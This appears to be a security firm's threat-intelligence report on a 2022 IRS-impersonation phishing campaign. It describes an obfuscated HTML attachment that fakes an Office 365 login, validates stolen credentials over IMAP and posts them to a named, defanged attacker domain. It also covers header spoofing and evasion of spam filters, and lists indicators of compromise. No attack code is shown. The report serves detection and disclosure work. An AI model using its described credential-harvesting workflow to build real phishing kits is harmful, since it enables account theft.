Cybercriminals leverage advanced tactics in their phishing kits, giving them a high success rate of delivering spoofed emails containing malicious attachments just before the tax filing deadline ends. ‘IRS 2021 in the United States on April 18, 2022 – there was a notable campaign detected that took advantage of phishing emails impersonating the IRS, and in particular one of the industry vendors that provides solutions to government agencies, including e-mailing, digital communications management, and content delivery system that notifies citizens of various updates.
Cybercriminals deliberately choose specific times when we are all busy with taxes and preparing for the holidays (e.g. Easter), so you should be especially careful during these times.
Spoofed IT service provider actors are widely used by major federal agencies, including DHS, and other similar state and city websites in the United States. The identified phishing email warned victims of late payments to the IRS, who would then have to pay via PayPal, the email contained an HTML attachment mimicking an electronic invoice.
Notably, the email does not contain any URLs and was successfully delivered to the victim’s inbox without being flagged as potential spam. Based on the inspected headers, the email was sent through multiple “hops” primarily exploiting US-registered network hosts and domains:
It should be noted that as of the date of detection, none of the hosts involved had been previously “blacklisted” and showed no signs of a negative IP address or anomalous domain reputation:
The HTML attachment with the fake IRS invoice contains obfuscated JS-based code.
Further analysis revealed embedded scenarios detecting the victim’s IP address (using the GEO2IP module, deployed on a third-party website), likely performed to selectively choose targets or to filter by region.
Once the user opens the HTML attachment, the phishing script encourages them to enter their credentials, this is done by using an interactive form to impersonate the Office 365 authorization mechanism .
After the user enters their credentials, the phishing kit automatically attempts to verify access to the victim’s email account via IMAP:
Based on deobfuscated JS content, actors exploited “supportmicrohere[.]com” domain. The threat actors probably tried to impersonate Microsoft technical support and trick the user into using the domain with a similar spelling.
The script intercepts the entered credentials and passes them through the POST request:
HTTP POST transmits the login and password to the script deployed on jbdelmarket[.]com:
The jbdelmarket domain[.]com hosts a set of scripts to analyze the victim’s IP:
Actors record all hosts accessing the phishing page:
Notably, the header of the phishing email contains several domain names with SPF and DKIM records:
Additionally, the attackers exploited email header fields, including Account code X (“USIRS”), X-Destination-ID and X-ReportingKey ([email protected][.]com).
The phishing email also had a Return-Path field set as another attacker-controlled email that collects information about unsuccessfully delivered emails. The Return-Path is used to handle bounced emails, and it defines how and where bounced emails will be handled.
- crowned by divinity[.]com
- [email protected][.]com
The Resecurity HUNTER team has shared information about the identified phishing campaign with the Internal Revenue Service (IRS), Online Fraud Detection and Prevention (OFDP), and the Treasury Inspector General’s Hotline for tax administration (TIGTA). We encourage Internet users to be particularly careful when receiving such e-mails and to validate them beforehand without opening any attachments, as this could compromise your digital identity and/or your e-mail, and lead to the theft of data.
For independent security researchers and the cybersecurity community, we are sharing a sample of phishing emails captured by our Cyber Threat Intelligence system for further review to increase detection of similar campaigns in the future .